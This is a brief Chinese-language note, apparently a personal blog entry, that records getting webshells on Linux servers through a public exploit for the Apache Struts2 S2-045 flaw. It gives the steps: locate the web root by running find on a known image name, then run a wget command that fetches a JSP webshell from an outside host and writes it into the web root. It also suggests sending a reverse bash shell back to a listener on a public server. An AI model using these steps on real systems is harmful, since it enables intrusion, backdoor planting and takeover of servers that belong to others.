网上放出了python版的struts2 s2-45漏洞利用exp,可执行win或linux命令。
实践了几个linux服务器,记录下linux下获取webshell过程。
访问web,随便挑一个图片文件名,如qzxdh.jpg,利用exp执行find / -name qzxdh.jpg,获取web物理路径。
利用wget http://qzxdh.com/jspshell.txt -O /webroot/jspshell.jsp,获取jspwebshell。
如有公网服务器,可在公网服务器上侦听端口,利用exp执行命令将目标的bash弹回。